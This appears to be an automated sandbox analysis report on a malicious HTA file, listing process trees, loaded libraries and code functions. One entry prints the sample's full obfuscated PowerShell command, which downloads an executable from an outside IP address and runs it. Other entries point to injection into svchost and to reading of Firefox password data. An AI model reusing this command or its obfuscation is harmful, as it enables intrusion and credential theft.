                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADD5B013_2_03ADD5B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B0059113_2_03B00591
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4053513_2_03A40535
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF757113_2_03AF7571
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEE4F613_2_03AEE4F6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFF43F13_2_03AFF43F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3146013_2_03A31460
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF244613_2_03AF2446
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5FB8013_2_03A5FB80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A7DBF913_2_03A7DBF9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF6BD713_2_03AF6BD7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFFB7613_2_03AFFB76
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFAB4013_2_03AFAB40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADDAAC13_2_03ADDAAC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A85AA013_2_03A85AA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3EA8013_2_03A3EA80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEDAC613_2_03AEDAC6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB3A6C13_2_03AB3A6C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFFA4913_2_03AFFA49
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF7A4613_2_03AF7A46
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A429A013_2_03A429A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B0A9A613_2_03B0A9A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5696213_2_03A56962
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4995013_2_03A49950
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B95013_2_03A5B950
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A268B813_2_03A268B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A438E013_2_03A438E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6E8F013_2_03A6E8F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4284013_2_03A42840
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4A84013_2_03A4A840
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFFFB113_2_03AFFFB1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41F9213_2_03A41F92
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4CFE013_2_03A4CFE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A32FC813_2_03A32FC8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A60F3013_2_03A60F30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFFF0913_2_03AFFF09
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB4F4013_2_03AB4F40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A49EB013_2_03A49EB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A52E9013_2_03A52E90
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFCE9313_2_03AFCE93
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFEEDB13_2_03AFEEDB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFEE2613_2_03AFEE26
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40E5913_2_03A40E59
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A58DBF13_2_03A58DBF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3ADE013_2_03A3ADE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5FDC013_2_03A5FDC0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4AD0013_2_03A4AD00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF7D7313_2_03AF7D73
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A43D4013_2_03A43D40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF1D5A13_2_03AF1D5A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0CB513_2_03AE0CB5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A30CF213_2_03A30CF2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFFCF213_2_03AFFCF2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB9C3213_2_03AB9C32
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40C0013_2_03A40C00
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4360B15_2_06A4360B
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4365415_2_06A43654
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A3971C15_2_06A3971C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A434BB15_2_06A434BB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4BCC715_2_06A4BCC7
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4BCCB15_2_06A4BCCB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A454DB15_2_06A454DB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A435FF15_2_06A435FF
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A452B215_2_06A452B2
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A452BB15_2_06A452BB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4DACB15_2_06A4DACB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4A3FB15_2_06A4A3FB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A398DD15_2_06A398DD
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A6417B15_2_06A6417B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 84 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 266 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 88 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 36 times
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: String function: 00038900 appears 42 times
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: String function: 00017DE1 appears 35 times
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: String function: 00030AE3 appears 70 times
                  Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winHTA@18/16@18/12
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0007A06A GetLastError, FormatMessageW
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_000681CB AdjustTokenPrivileges, CloseHandle
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_000687E1 LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0007B333 SetErrorMode, GetDiskFreeSpaceExW, SetErrorMode
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0008EE0D CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0007C397 CoInitialize, CoCreateInstance, CoUninitialize
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00014E89 CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ima4unv.jsq.ps1
                  Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: AtBroker.exe, 00000010.00000002.3664527850.0000000003448000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: njo.hta | Virustotal: Detection: 40%
                  Source: njo.hta | ReversingLabs: Detection: 27%
                  Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\njo.hta"
                  Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'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'+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD004.tmp" "c:\Users\user\AppData\Local\Temp\qetstupm\CSCEF30E185BA76444FA670BC63B6F1A196.TMP"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\igcc.exe "C:\Users\user\AppData\Roaming\igcc.exe"
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\igcc.exe"
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
                  Source: C:\Windows\SysWOW64\AtBroker.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Section loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Section loaded: wininet.dll
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Section loaded: mswsock.dll
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Section loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Section loaded: iphlpapi.dll
